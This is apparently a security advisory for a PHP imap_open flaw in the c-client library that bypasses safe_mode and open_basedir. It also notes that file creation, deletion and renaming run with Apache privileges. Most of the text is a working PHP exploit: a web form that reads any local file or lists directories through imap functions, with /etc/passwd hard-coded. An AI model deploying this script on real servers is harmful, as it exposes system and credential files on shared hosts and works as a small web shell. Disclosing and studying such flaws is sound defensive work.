(PHP) imap functions bypass safemode and open_basedir restrictions

[ced.clerget () free fr]

Vulnerability in c-client library (tested with versions 2000,2001,2004), mail_open
could be used to open stream to local files.

For php and imap module

imap_open allow to bypass safemode and open_basedir restrictions.
Use imap_body or others to view a file and imap_list to recursively list a directory.

s/mailbox/file :)
imap_createmailbox
imap_deletemailbox
imap_renamemailbox
to create,delete,rename files with apache privileges.

##### code #####

<form action="" method="post">
<select name="switch">
<option selected="selected" value="file">View file</option>
<option value="dir">View dir</option>
</select>
<input type="text" size="60" name="string">
<input type="submit" value="go">
</form>

<?php
        $string = !empty($_POST['string']) ? $_POST['string'] : 0;
        $switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;

        if ($string && $switch == "file") {
                $stream = imap_open($string, "", "");
                if ($stream == FALSE)
                        die("Can't open imap stream");

                $str = imap_body($stream, 1);
                if (!empty($str))
                        echo "<pre>".$str."</pre>";
                imap_close($stream);
        } elseif ($string && $switch == "dir") {
                $stream = imap_open("/etc/passwd", "", "");
                if ($stream == FALSE)
                        die("Can't open imap stream");

                $string = explode("|",$string);
                if (count($string) > 1)
                        $dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
                else
                        $dir_list = imap_list($stream, trim($string[0]), "*");
                echo "<pre>";
                for ($i = 0; $i < count($dir_list); $i++)
                        echo "$dir_list[$i]\n";
                echo "</pre>";
                imap_close($stream);
        }
?>

################